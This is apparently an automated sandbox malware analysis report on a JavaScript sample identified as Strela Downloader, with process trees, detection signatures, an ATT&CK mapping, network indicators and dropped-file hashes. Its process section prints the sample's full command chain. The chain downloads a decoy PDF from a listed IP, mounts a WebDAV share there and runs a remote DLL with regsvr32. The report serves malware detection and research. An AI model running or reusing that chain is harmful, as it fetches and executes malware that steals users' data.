Windows
Analysis Report
27374120242908411416.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 6980 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\27374 1202429084 11416.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7068 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\252 0318349138 0.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7076 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7120 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 6544 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 5632 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7164 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 24 --field -trial-han dle=1720,i ,160597664 0272262511 1,64678140 5713881841 6,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 1204 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588365 |
Start date and time: | 2025-01-11 01:22:48 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 8s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 18 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 27374120242908411416.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 3.233.129.217, 52.22.41.97, 52.6.155.20, 3.219.243.226, 172.64.41.3, 162.159.61.3, 184.28.90.27, 23.209.209.135, 199.232.210.172, 2.16.168.107, 2.16.168.105, 23.200.0.173, 23.200.0.196, 192.168.2.12, 4.245.163.56, 23.56.162.204
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- VT rate limit hit for: 27374120242908411416.js
Time | Type | Description |
---|---|---|
19:23:46 | API Interceptor | |
19:23:50 | API Interceptor | |
19:23:50 | API Interceptor | |
19:23:57 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7722229210216408 |
Encrypted: | false |
SSDEEP: | 1536:pJNVxIssjfjonQaKQA0bTMe0bS0bfQJZfhcZyPzJ0iDub69OGd+lJzZgSsrEGTWO:pJV3wb7cOrGqXuT72iIa5lzr |
MD5: | 5245E96EB9A876C37B6FA35F22AEE0F0 |
SHA1: | 4295AFA7136B4C802A40AD43F8DECFE694A92295 |
SHA-256: | 1265CB3F61905238DC740ED6B68815F36CF23A8B08D85DD4083D95445A2BB40A |
SHA-512: | 02C2C1FC8135A717BA22FCF262ED3F89628EA4F820F83A77BF4AF1376EAAC8D1E8FBF9ADAF8158C87C88D8FF798FB30DFEE5150AE1F02BCD82BAB534E153ABAC |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7815805616150296 |
Encrypted: | false |
SSDEEP: | 1536:5SB2ESB2SSjlK/dviQJ5dyDkZA0bVQJOYkr3g16xz2UPkLk+k0KQRkjskjD+qaN4:5azanvxugz2UESQ |
MD5: | A94C24FFBA8973FF9C7454376C162248 |
SHA1: | AB6AE6A17C3FBE95B11A0EBEC5903B422631237B |
SHA-256: | 6E8947AD8889DD9CC550F8A81CDEB76A82EC6F4C7F98FA2E1F70F5A29543FD44 |
SHA-512: | DB7717CCFC9AA7C3E65A56F53EE80B86799B5380CACFD4F078A84D7652DD1C893848F1AA9C8A518A737630F02DCBA5E8B20B366A5CE2A7C680A327F69D01D640 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
